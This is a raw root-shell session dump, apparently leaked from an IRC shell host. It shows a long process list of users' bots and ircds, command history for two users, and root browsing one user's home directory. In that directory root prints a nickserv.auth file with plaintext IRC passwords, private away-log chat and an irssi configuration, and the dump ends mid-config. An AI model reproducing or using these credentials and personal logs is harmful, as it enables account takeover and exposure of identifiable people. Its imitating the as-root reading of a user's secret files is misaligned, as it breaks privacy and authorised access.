bpunux 28911 0.0 0.1 3068 976 p0- S 31Oct08 6:58.93 ./psybnc
tarawa 33111 0.0 0.3 29660 2640 p0- S 14Mar08 106:21.81 ./psybnc
reznik 33517 0.0 0.1 40788 1268 p0- S 27Apr08 44:00.81 ./psybnc
genosyde 34316 0.0 0.1 3192 1464 p0- S 5Jun08 39:10.11 ./eggdrop -m (eggdrop-1.6.18)
chrirc 40199 0.0 0.1 4248 628 p0- S 12Jun08 3:50.57 ./services
vamp 44090 0.0 0.2 3936 2464 p0- S 27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
vamp 44142 0.0 0.2 8352 2400 p0- S 27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
vamp 44170 0.0 0.2 3720 2120 p0- S 27Jan08 93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
darien9 46897 0.0 0.1 84316 1384 p0- S 1Apr08 1518:35.73 ./psybnc
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
romeo 51241 0.0 0.7 9932 6740 p0 S+ 11:50PM 0:34.89 irssi -h absolute.ownage.net
burnt 59824 0.0 0.3 5952 3156 p0- S 27Jan08 54:17.27 ircd: wasted.ufc-pride.org (ircd)
burnt 59989 0.0 0.1 9012 1108 p0- S 27Jan08 5:52.73 ./services
sharpie 63388 0.0 0.2 3908 2172 p0- S 27Jan08 61:39.10 ./eggdrop egg (eggdrop-1.6.15)
daali 79885 0.0 0.3 5032 2656 p0- S 28Jan08 55:47.60 ./eggdrop (eggdrop-1.6.18)
darkevil 84286 0.0 0.1 3868 704 p0- S 25Mar08 17:04.32 ircd: irc.darkquest.org (ircd)
sharpie 95504 0.0 0.2 3812 2140 p0- S 25Apr08 53:07.90 ./eggdrop sun (eggdrop-1.6.15)
sharpie 95593 0.0 0.2 3708 2148 p0- S 25Apr08 51:59.24 ./eggdrop spank (eggdrop-1.6.15)
root 22120 0.0 0.2 3220 1888 p1 Ss 9:16PM 0:00.03 -bash (bash)
root 22827 0.0 0.1 1648 980 p1 R+ 9:32PM 0:00.00 ps -auxwww
dark 3869 0.0 0.2 31228 2488 p2- S 22Apr09 11:35.44 ./psybnc
romeo 4433 0.0 0.1 2040 1448 p2 S+ 7:09PM 0:00.04 screen -r
mooo 10652 0.0 0.2 41984 2284 p2- S 21May09 11:44.09 ./psybnc
tlm 11616 0.0 0.2 27520 1788 p2- S 26Apr09 4:20.44 ./psybnc
vamp 18167 0.0 0.1 29116 1320 p2- S 5Apr08 23:34.92 ./psybnc
wchan21 29220 0.0 0.2 10628 2024 p2- S 30Apr09 7:46.46 ./psybnc psybnc.conf
mimik0r 29613 0.0 0.2 5176 2248 p2- S 30May09 3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
psycoz 29853 0.0 0.1 3248 1404 p2- S 7Jun09 1:13.18 ./psybnc
zeepysea 33510 0.0 0.1 1424 620 p2- S 20Mar08 291:26.11 ./bopm
lordy 33773 0.0 0.1 6120 1468 p2- S 30May09 440:58.20 ./bot
lordy 33777 0.0 0.1 3848 944 p2- S 30May09 360:11.97 ./bot
lordy 33783 0.0 0.2 7468 1684 p2- S 30May09 444:16.39 ./bot
lordy 33807 0.0 0.1 4696 1024 p2- S 30May09 439:42.64 ./bot
lordy 33811 0.0 0.1 5784 1088 p2- S 30May09 443:07.55 ./bot
narcissu 34556 0.0 0.1 136368 564 p2- S 20Feb08 38:20.52 ./psybnc
cmm 37284 0.0 0.2 22500 1724 p2- S 13Apr09 6:35.61 ./psybncD
devil 43929 0.0 0.2 15176 2316 p2- S 22May09 8:40.13 sshd
yaquis 47275 0.0 0.2 2976 1680 p2- S 6Jun09 1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
chaos1 48442 0.0 0.3 3400 2812 p2- S 10:44PM 0:07.40 ircd: irc.sonicanime.net (ircd)
chaos1 48822 0.0 0.7 8296 7116 p2- S 10:52PM 0:01.09 /home/chaos1/core/anope/host/services
chaos1 49843 0.0 0.6 7060 6444 p2- S 11:19PM 1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
tarawa 51960 0.0 3.6 82452 36732 p2- S 17May09 10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
yaquis 52945 0.0 0.1 1432 960 p2- S 12:31AM 0:48.93 ./bopm
mlh 54757 0.0 0.2 3620 2108 p2- S 8Apr09 8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
safety 59083 0.0 0.2 3316 1752 p2- S 22May09 1:49.86 ./psybnc
brosco 59827 0.0 0.2 3912 2532 p2- S 1Jun09 3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.05 -bash (bash)
cpu 60695 0.0 0.2 12308 1880 p2- S 22May09 2:16.63 ./gramicci
bollox 61265 0.0 0.2 3556 2068 p2- S 1May09 5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
dealer 74736 0.0 0.2 3180 1636 p2- S 8Apr09 6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
ircjaymz 75110 0.0 0.1 10012 1220 p2- S 18Mar08 24:56.65 ircd: ircdt.com (ircd)
redrum 80211 0.0 0.6 9244 6144 p2- S 9Jun09 9:12.34 ./eggdrop (eggdrop-1.6.19)
redrum 80260 0.0 0.6 6868 5764 p2- S 9Jun09 2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
bollox 80752 0.0 0.2 3812 2152 p2- S 7Apr09 8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
cazz1961 81636 0.0 0.2 3236 1784 p2- S 8May09 11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
poolboy 85768 0.0 2.3 38696 23352 p2- S 13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
qfx 85944 0.0 0.2 3592 2016 p2- S 10Jun09 0:53.81 ./psybnc
tarawa 88344 0.0 3.0 31980 30444 p2- S 26May09 5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
bollox 90551 0.0 0.3 4188 2616 p2- S 10Jun09 4:03.14 ./psybnc
darien9 363 0.0 0.1 126420 1276 p3- S 6Mar08 967:34.73 ./psybnc
sysc 3001 0.0 0.1 53544 1492 p3- S 27Jan08 28:52.73 ./psybnc
sqd 15833 0.0 0.1 19444 1436 p3- S 4Aug08 27:53.54 ./psybnc
crazyl 37528 0.0 0.1 20120 1464 p3- S 27Nov08 8:58.67 ./psybnc
en0prcv 58418 0.0 0.1 67988 1228 p3- S 4Apr08 97:19.44 ./psybnc
skypilot 65653 0.0 0.0 7460 388 p3- S 19Nov08 2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
chevym4n 6472 0.0 0.1 5156 772 p4- S 27Jan08 17:56.69 ircd: pdev.SummitIRC.com (ircd)
cpu 10289 0.0 0.2 27016 2152 p4- S 14Apr09 5:33.20 ./subdue
cpu 10303 0.0 0.2 24588 1896 p4- S 14Apr09 4:56.34 ./arc
oby1 18390 0.0 0.1 103980 1392 p4- S 8Oct08 37:31.06 ./psybnc
skypilot 43173 0.0 0.1 5612 968 p4- S 3Nov08 10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
cmm 60721 0.0 0.3 100744 3488 p4- S 10Apr09 50:30.96 ./psybncC
cmm 60933 0.0 0.3 31732 2888 p4- S 10Apr09 26:32.93 ./psybncB
cmm 61190 0.0 0.2 26200 2420 p4- S 10Apr09 14:16.41 ./psybncR
pimpinjg 63286 0.0 0.2 3268 1776 p4 Is Wed10PM 0:00.03 /usr/local/bin/bash
pimpinjg 63289 0.0 0.9 12636 9372 p4 S+ Wed10PM 1:16.45 irssi -h 72.20.28.217
darien9 74450 0.0 0.2 38220 2084 p4- S 31Oct08 107:35.62 ./psybnc
digitalman 97383 0.0 0.2 12644 2436 p4- S 20May09 6:43.68 ./psybnc psybnc.conf
chevym4n 11847 0.0 0.1 5892 756 p6- S 25Oct08 13:16.82 ircd: irc.SummitIRC.com (ircd)
crrj13 60894 0.0 0.4 14816 4384 p6- S 6May09 1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
lynx 71244 0.0 0.1 15292 1164 p6- S 27Aug08 13:54.41 ./psybnc
yaquis 81249 0.0 0.2 2952 1664 p6- S 5Jun09 2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
yaquis 81862 0.0 5.6 58788 57552 p6- S 13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
darien9 95226 0.0 0.1 7876 1096 p6- S 23Jul08 20:45.03 ./psybnc
baxxta 95367 0.0 0.1 8020 1144 p6- S 22Jul08 13:11.93 ./psybnc
yaquis 98909 0.0 0.1 3140 1312 p6- S 30May09 1:26.70 ./psybnc
nardi 18637 0.0 0.1 1480 680 p7- S 10Mar09 33:41.69 ./bopm
crash 29763 0.0 0.3 32276 3504 p7- S 30Jan09 164:54.34 ./psybnc1
mlh 52784 0.0 0.3 4584 3340 p7- S 10Jan09 22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
nyakz 54517 0.0 0.2 30984 2448 p7- S 13Mar09 52:56.09 ./psybnc
nardi 76675 0.0 0.1 5024 912 p7- S 8Feb09 7:16.69 ircd: Java.Albworld.Net (ircd)
sqd 77187 0.0 0.2 3352 1584 p7- S 21Jan09 13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
darkuno3 77376 0.0 0.1 3400 792 p7- S 10Mar09 4:06.45 ircd: 72.20.28.219 (ircd)
lyhne1 88130 0.0 0.4 10540 3712 p7- S 22Dec08 69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
lymelyte 88229 0.0 0.3 3880 3016 p7- S 29Mar09 7:28.37 ircd: irc.ftaresource.com (ircd)
chozen1 89082 0.0 0.1 3192 1032 p7- S 1Mar09 5:32.87 ./psybnc
kokoryu 93127 0.0 0.3 4060 2852 p7- S 6Feb09 32:11.57 ./eggdrop (eggdrop-1.6.19)
hts 96224 0.0 0.6 39004 6252 p7- S 2Mar09 51:21.25 ircd: vital.irc.hackthissite.org (ircd)
visage 96264 0.0 0.2 3192 1692 p7- S 13Mar09 9:27.48 ./eggdrop -m (eggdrop-1.6.19)
mrts 24165 0.0 0.2 3176 1612 p8- S 28Mar09 7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
jax66 57226 0.0 0.1 1516 652 p8- S 11May09 24:51.69 ./bopm
brosco 58343 0.0 0.2 15992 1800 p8- S 29Mar09 8:13.84 ./psybnc
dv327 76866 0.0 0.1 27624 1208 p8- S 9Aug08 15:14.39 ./psybnc
subkult 88094 0.0 0.1 72724 1280 p8- S 15Jan09 80:54.12 ./psybnc
bluewish 97486 0.0 0.2 3552 1852 p8- S 29Mar09 8:28.42 ./eggdrop (eggdrop-1.6.19)
brosco 31552 0.0 0.3 3792 2592 p9- S 16Mar09 14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
mrts 32626 0.0 0.2 3176 1620 p9- S 20Mar09 8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
poolboy 44789 0.0 0.2 3448 1956 p9- S 9Feb09 15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
poolboy 44901 0.0 0.2 3312 1896 p9- S 9Feb09 15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
bollox 60129 0.0 0.3 5308 3376 p9- S 4Jun09 2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
bollox 60150 0.0 0.3 5164 3280 p9- S 4Jun09 2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
brosco 76877 0.0 0.2 3760 2348 p9- S 19Mar09 13:04.80 ./eggdrop-1.6.19 -m plague.conf
crash 99452 0.0 0.2 37052 2128 p9- S 19Mar09 12:20.42 ./psybnc-oth
paleride 265 0.0 0.2 3648 2092 pb- S 27Jan09 19:36.88 ircd: irc.leechnet.net (ircd)
paleride 908 0.0 0.1 4276 788 pb- S 27Jan09 1:40.52 ./services -nofork
grumpy 79140 0.0 0.3 5576 2692 pb- S 4Feb09 16:37.28 ircd: irc.sidnaceous.com (ircd)
grumpy 82947 0.0 0.1 7572 1140 pb- I 4Feb09 1:28.12 ./services start
nardi 17529 0.0 0.1 25992 1028 pc- S 24Mar09 23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
cazz1961 17100 0.0 0.6 8824 6268 pd- S Sun06AM 87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
omgwtf 29455 0.0 0.2 3408 1996 pd- S Sat04AM 0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
omgwtf 29570 0.0 0.2 3572 2228 pd- S Sat04AM 0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
zeepysea 37950 0.0 0.2 3684 1952 pd- S 17Mar09 10:42.06 ircd: irc.eoegameservers.com (ircd)
zeepysea 38077 0.0 0.1 8204 1092 pd- S 17Mar09 1:07.05 ./services start
genosyde 63662 0.0 0.2 17308 2432 pd- S 27Jan09 21:57.28 ./psybnc
matt 83686 0.0 0.1 3140 1184 pd- S Sat05PM 0:17.40 ./psybnc psybnc.conf
mrts 84263 0.0 0.2 3172 1636 pd- S 20Mar09 8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
yaquis 94000 0.0 0.5 58432 5312 pd- S Fri10PM 4:51.24 ircd: irc2.accesox.net (ircd)
cont 49538 0.0 0.2 19684 1784 pe- S 11Jan09 12:46.04 ./psybnc
chaos1 56819 0.0 0.8 11604 8064 pf- I 18Jun09 0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
[root@velocity:/var/run]#

[root@velocity:~]# lastcomm -u romeo
sh - romeo __ 0.00 us
ls - romeo __ 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
w - romeo ttyp1 0.00 us
sh - romeo ttyp1 0.00 us
sshd -F romeo __ 0.59 us
bash - romeo ttyp1 0.00 us
ls - romeo ttyp1 0.00 us
w - romeo ttyp1 0.00 us
screen - romeo ttyp1 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
screen -F romeo __ 0.00 us
w - romeo ttyp1 0.00 us
sh - romeo ttyp1 0.00 us

[root@velocity:~]# lastcomm -u pimpinjg
sshd -F pimpinjg __ 0.00 us
bash - pimpinjg ttyp2 0.00 us
screen - pimpinjg ttyp2 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
fortune - pimpinjg ttyp2 0.00 us
sshd -F pimpinjg __ 0.00 us
sftp-server - pimpinjg __ 0.02 us
sshd -F pimpinjg __ 0.03 us
bash - pimpinjg ttyp2 0.00 us
tput - pimpinjg ttyp2 0.00 us
screen - pimpinjg ttyp2 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
screen -F pimpinjg __ 0.00 us
fortune - pimpinjg ttyp2 0.00 us

[root@velocity:/home/romeo]# ls -la
total 80
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ./
drwx--x--x 204 root wheel 3584 Jun 17 18:30 ../
-rw------- 1 romeo romeo 5 Jun 17 18:35 .bash_history
-rw-r--r-- 1 romeo romeo 44 Jun 13 08:05 .bash_profile
-rw-r--r-- 1 romeo romeo 2469 Jun 13 08:00 .bashprompt
-rw-r--r-- 1 romeo romeo 258 Jun 13 08:03 .bashrc
-rw-r--r-- 1 romeo romeo 767 Jun 13 07:56 .cshrc
-rw-r--r-- 1 romeo romeo 23 Jun 17 18:39 .forward
drwx------ 4 romeo romeo 512 Jun 17 09:42 irclogs/
drwx------ 3 romeo romeo 512 Jun 17 09:42 .irssi/
-rw------- 1 romeo romeo 35 Jun 26 17:58 .lesshst
-rw-r--r-- 1 romeo romeo 248 Jun 13 07:56 .login
-rw-r--r-- 1 romeo romeo 158 Jun 13 07:56 .login_conf
-rw------- 1 romeo romeo 373 Jun 13 07:56 .mail_aliases
-rw-r--r-- 1 romeo romeo 331 Jun 13 07:56 .mailrc
-rw-r--r-- 1 romeo romeo 797 Jun 13 07:56 .profile
-rw------- 1 romeo romeo 276 Jun 13 07:56 .rhosts
-rw-r--r-- 1 romeo romeo 975 Jun 13 07:56 .shrc
drwx------ 2 romeo romeo 512 Jun 20 02:58 .ssh/

[root@velocity:/home/romeo]# cat .ssh/known_hosts
[root@velocity:/home/romeo]#

[root@velocity:/home/romeo/.irssi]# ls -la
total 108
drwx------ 3 romeo romeo 512 Jun 17 09:42 ./
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ../
-rw------- 1 romeo romeo 4500 Jun 28 02:13 away.log
-rw-r--r-- 1 romeo romeo 9591 Jun 27 22:51 config
-rw-r----- 1 romeo romeo 584 Jun 17 07:16 config.old
-rw-r----- 1 romeo romeo 8472 Jun 27 21:56 default.theme
-rw-r--r-- 1 romeo romeo 8466 Feb 20 16:08 fear2.theme
-rw------- 1 romeo romeo 70 Jun 17 07:31 nickserv.auth
-rw-r--r-- 1 romeo romeo 74 Jun 17 07:31 nickserv.networks
-rw-r--r-- 1 romeo romeo 4667 Jun 27 21:56 pandemonium.theme
drwxr-xr-x 3 romeo romeo 512 Jun 22 17:50 scripts/
[root@velocity:~]#

[root@velocity:/home/romeo/.irssi]# cat nickserv.auth
secchat RoMeO ve2aZCp3GYoq
bhf RoMeO ra7plmyt
tdirc RoMeO sidfh928rf783
[root@velocity:~]#

[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log
--- Log opened Tue Jun 30 01:08:25 2009
01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e
02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
--- Log closed Tue Jun 30 04:12:51 2009
--- Log opened Tue Jun 30 19:19:25 2009
19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
--- Log closed Tue Jun 30 20:06:56 2009
--- Log opened Tue Jun 30 21:22:55 2009
21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
--- Log closed Tue Jun 30 22:17:55 2009
--- Log opened Wed Jul 01 00:59:13 2009
--- Log closed Wed Jul 01 01:00:01 2009
--- Log opened Wed Jul 01 01:00:23 2009
01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e
01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e
01:34 #bhf: (c+c>/HTHg) ehis response: <RoMeO> when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
01:34 #bhf: (cc8/Darkg8/:3/Romeog) e
01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
--- Log closed Wed Jul 01 02:43:40 2009
--- Log opened Wed Jul 01 03:32:17 2009
--- Log closed Wed Jul 01 03:32:22 2009
--- Log opened Wed Jul 01 03:32:24 2009
--- Log closed Wed Jul 01 05:38:09 2009
--- Log opened Wed Jul 01 06:53:32 2009
--- Log closed Wed Jul 01 06:53:36 2009
--- Log opened Wed Jul 01 06:53:44 2009
07:03 #darkmindz: (c&c>/Xiresg) e<RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[root@velocity:/]#

[root@velocity:/home/romeo/.irssi]# cat config
servers = (
  { address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
  { address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
  {
    address = "irc.undernet.org";
    chatnet = "Undernet";
    port = "6667";
  },
  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
  { address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
  { address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
  { address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
  { address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
  {
    address = "irc.securitychat.org";
    chatnet = "secchat";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  {
    address = "irc.blackhat-forums.com";
    chatnet = "bhf";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  {
    address = "irc.tdirc.net";
    chatnet = "tdirc";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  }
);

chatnets = {
  IRCNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "5";
    max_whois = "4";
    max_query_chans = "5";
  };
  EFNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  Undernet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "3";
  };
  DALNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "6";
    max_msgs = "3";
  };
  OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
  GIMPNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  PTLink = {
    type = "IRC";
    max_kicks = "1";
    max_modes = "6";
    max_msgs = "100";
  };
  SILC = { type = "SILC"; };
  secchat = { type = "IRC"; };
  bhf = { type = "IRC"; };
  tdirc = { type = "IRC"; };
};

channels = (
  { name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
  { name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
);

aliases = {
  J = "join";
  WJOIN = "join -window";
  WQUERY = "query -window";
  LEAVE = "part";
  BYE = "quit";
  EXIT = "quit";
  SIGNOFF = "quit";
  DESCRIBE = "action";
  DATE = "time";
  HOST = "userhost";
  LAST = "lastlog";
  SAY = "msg *";
  WI = "whois";
  WII = "whois $0 $0";
  WW = "whowas";
  W = "who";
  N = "names";
  M = "msg";
  T = "topic";
  C = "clear";
  CL = "clear";
  K = "kick";
  KB = "kickban";
  KN = "knockout";
  BANS = "ban";
  B = "ban";
  MUB = "unban *";
  UB = "unban";
  IG = "ignore";
  UNIG = "unignore";
  SB = "scrollback";
  UMODE = "mode $N";
  WC = "window close";
  WN = "window new hide";
  SV = "say Irssi $J ($V) - http://irssi.org/";
  GOTO = "sb goto";
  CHAT = "dcc chat";
  RUN = "SCRIPT LOAD";
  SBAR = "STATUSBAR";
  INVITELIST = "mode $C +I";
};

statusbar = {
  # formats:
  # when using {templates}, the template is shown only if its argument isnt
  # empty unless no argument is given. for example {sb} is printed always,
  # but {sb $T} is printed only if $T isnt empty.

  items = {
    # start/end text in statusbars
    barstart = "{sbstart}";
    barend = "{sbend}";

    # treated "normally", you could change the time/user name to whatever
    time = "{sb $Z}";
    user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";

    # treated specially .. window is printed with non-empty windows,
    # window_empty is printed with empty windows
    window = "{sb $winref:$T{sbmode $M}}";
    window_empty = "{sb $winref{sbservertag $tag}}";
    prompt = "{prompt $[.15]T}";
    prompt_empty = "{prompt $winname}";
    topic = " $topic";
    topic_empty = " Irssi v$J - http://irssi.org/help/";

    # all of these treated specially, theyre only displayed when needed
    lag = "{sb Lag: $0-}";
    act = "{sb Act: $0-}";
    more = "-- more --";
  };

  # theres two type of statusbars. root statusbars are either at the top
  # of the screen or at the bottom of the screen. window statusbars are at
  # the top/bottom of each split window in screen.
  default = {
    # the "default statusbar" to be displayed at the bottom of the window.
    # contains all the normal items.
    window = {
      disabled = "no";

      # window, root
      type = "window";
      # top, bottom
      placement = "bottom";
      # number
      position = "1";
      # active, inactive, always
      visible = "active";

      # list of items in statusbar in the display order
      items = {
        barstart = { priority = "100"; };
        time = { };
        user = { };
        window = { };
        window_empty = { };
        lag = { priority = "-1"; };
        act = { priority = "10"; };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # statusbar to use in inactive split windows
    window_inact = {
      type = "window";
      placement = "bottom";
      position = "1";
      visible = "inactive";
      items = {
        barstart = { priority = "100"; };
        window = { };
        window_empty = { };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # we treat input line as yet another statusbar :) Its possible to
    # add other items before or after the input line item.
    prompt = {
      type = "root";
      placement = "bottom";
      # we want to be at the bottom always
      position = "100";
      visible = "always";
      items = {
        prompt = { priority = "-1"; };
        prompt_empty = { priority = "-1"; };
        # treated specially, this is the real input line.
        input = { priority = "10"; };
      };
    };

    # topicbar
    topic = {
      type = "root";
      placement = "top";
      position = "1";
      visible = "always";
      items = {
        barstart = { priority = "100"; };
        topic = { };
        topic_empty = { };
        barend = { priority = "100"; alignment = "right"; };
      };
    };
  };
};
settings = {
|
||
core = {
|
||
real_name = "romeo haxxor"; // "romeo haxxed"
|
||
user_name = "RoMeO";
|
||
nick = "RoMeO";
|
||
|
||
timestamp_format = "%H:%M:%S";
|
||
hostname = "absolute.ownage.net"; // absolutely owned..
|
||
};
|
||
"fe-common/core" = {
|
||
autolog = "no";
|
||
autolog_path = "~/irclogs/$tag/$0-%m%y.log";
|
||
show_nickmode_empty = "yes";
|
||
theme = "pandemonium";
|
||
autocreate_own_query = "no";
|
||
autocreate_query_level = "DCCMSGS";
|
||
use_status_window = "no";
|
||
use_msgs_window = "yes";
|
||
};
|
||
"fe-text" = {
|
||
colors = "yes";
|
||
autostick_split_windows = "yes";
|
||
actlist_sort = "refnum";
|
||
};
|
||
};
|
||
logs = { };
|
||
ignores = ( );
|
||
keyboard = (
|
||
{ key = "meta-1"; id = "change_window"; data = "1"; },
|
||
{ key = "meta-2"; id = "change_window"; data = "2"; },
|
||
{ key = "meta-3"; id = "change_window"; data = "3"; },
|
||
{ key = "meta-4"; id = "change_window"; data = "4"; },
|
||
{ key = "meta-5"; id = "change_window"; data = "5"; },
|
||
{ key = "meta-6"; id = "change_window"; data = "6"; },
|
||
{ key = "meta-7"; id = "change_window"; data = "7"; },
|
||
{ key = "meta-8"; id = "change_window"; data = "8"; },
|
||
{ key = "meta-9"; id = "change_window"; data = "9"; },
|
||
{ key = "meta-0"; id = "change_window"; data = "10"; }
|
||
);
|
||
|
||
hilights = (
|
||
{ text = "RoMeO"; nick = "yes"; word = "yes"; },
|
||
{ text = "darkmindz"; nick = "yes"; word = "yes"; },
|
||
{ text = "antisec"; nick = "yes"; word = "yes"; },
|
||
{ text = "anti-sec"; nick = "yes"; word = "yes"; },
|
||
{ text = "zf0"; nick = "yes"; word = "yes"; },
|
||
{ text = "strayfe"; nick = "yes"; word = "yes"; },
|
||
{ text = "n3w7yp3"; nick = "yes"; word = "yes"; },
|
||
{ text = "copyandpaste"; nick = "yes"; word = "yes"; },
|
||
{ text = "blackhat"; nick = "yes"; word = "yes"; },
|
||
{ text = "whitehat"; nick = "yes"; word = "yes"; },
|
||
{ text = "b0rx"; nick = "yes"; word = "yes"; }
|
||
); // I wonder.. zf0?.. Lulz
|
||
|
||
windows = {
|
||
1 = { };
|
||
2 = {
|
||
immortal = "yes";
|
||
name = "(msgs)";
|
||
level = "MSGS ACTIONS DCCMSGS";
|
||
};
|
||
3 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#bhf";
|
||
tag = "bhf";
|
||
}
|
||
);
|
||
};
|
||
4 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#gso-chat";
|
||
tag = "bhf";
|
||
}
|
||
);
|
||
};
|
||
5 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#r00tsecurity";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
6 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#thedefaced";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
7 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#zer0zone";
|
||
tag = "tdirc";
|
||
}
|
||
);
|
||
};
|
||
8 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#kinqpinz";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
9 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
